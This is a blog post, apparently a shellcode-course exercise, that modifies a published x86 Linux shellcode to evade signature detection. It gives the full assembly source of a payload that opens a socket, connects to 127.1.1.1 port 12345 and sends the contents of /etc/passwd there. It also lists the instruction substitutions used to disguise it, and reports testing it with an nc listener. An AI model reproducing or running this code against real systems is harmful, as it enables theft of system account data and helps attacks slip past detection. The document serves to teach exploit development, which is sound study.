AdSense

Saturday, March 12, 2016

6_3 - Polymorphism: reading "/etc/passwd" file on 127.1.1.1:12345


6_3 - READING "/ETC/PASSWD"

1 - INTRODUCTION

- Same concepts studied at  6_1 apply in this case.


2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice has the effect of reading the "/etc/passwd" file and sending the content to 127.1.1.1 port 12345

http://shell-storm.org/shellcode/files/shellcode-861.php





- Let's see 4 possible modifications:


a) Instead of using "inc", adding 1:

    ; inc ebx 
     add ebx,0x1

b) When moving between two registers, going around using a third intermediate register, what is useless and harmless but distorts the code:

    ; mov esi, eax
     mov edx, eax
     mov esi, edx

c) Using "mov" instead of "push/pop":

    ; push 0x4
    ; pop eax
     mov eax, 0x4

d) Using "mov" instead of "push":

    ;push DWORD 0x0101017f  ;127.1.1.1
    ;push WORD 0x3930  ; Port 12345
    ;push WORD bx
    
    mov dword [esp-4], 0x0101017f ; <- mov instead or push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx

    sub esp,8

- The resulting assembly program of applying these modifications is A6_3.nasm:


section .text

global _start

_start:
    ; socket
    push BYTE 0x66   
    pop eax
    xor ebx, ebx 
    ; inc ebx 
    add ebx,0x1 ; <-adding 1 to ebx
    xor edx, edx
    push edx 
    push BYTE 0x1
    push BYTE 0x2
    mov ecx, esp
    int 0x80
    ; mov esi, eax 
    mov edx, eax ; <- going around
    mov esi, edx

    ; connect
    push BYTE 0x66 
    pop eax
    ; inc ebx
    add ebx,0x1 ; <-adding 1 to ebx
    
    ;push DWORD 0x0101017f  ;127.1.1.1
    ;push WORD 0x3930  ; Port 12345
    ;push WORD bx
    
    mov dword [esp-4], 0x0101017f ; <- mov instead or push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx
    sub esp,8

    mov ecx, esp
    push BYTE 16
    push ecx
    push esi
    mov ecx, esp
    ; inc ebx
    add ebx, 0x1 ; <-adding 1 to ebx
    int 0x80

    ; dup2
    mov esi, eax
    push BYTE 0x1
    pop ecx
    mov BYTE al, 0x3F
    int 0x80
    
    ;read the file
    jmp short call_shellcode
    
shellcode:
    push 0x5
    pop eax
    pop ebx
    xor ecx,ecx
    int 0x80
    mov ebx,eax
    mov al,0x3
    mov edi,esp
    mov ecx,edi
    xor edx,edx
    mov dh,0xff
    mov dl,0xff
    int 0x80
    mov edx,eax
    ; push 0x4
    ; pop eax
    mov eax, 0x4 ; <- mov instead of push/pop
    mov bl, 0x1
    int 0x80
    ; push 0x1
    ; pop eax
    mov eax, 0x1 ; <- mov instead of push/pop
    inc ebx
    int 0x80
   
call_shellcode:
    call shellcode
    message db "/etc/passwd"

3 - TESTING POLYMORPHISM

- Assembling and linking A6_3.nasm:



- Extracting the shellcode:





- Applying to ShellcodeTest.c program:






- Compiling ShellcodeTest.c:



- For testing the program, from a new console nc tool is used to listen on 127.1.1.1:12345:





- Executing ShellcodeTest.c the result is the same as the original program, the file "/etc/passwd" can be read on address 127.1.1.1 port 12345:








- While the original shellcode had 111 Bytes, the new one has got 104 Bytes. It means a reduction of 6.3%.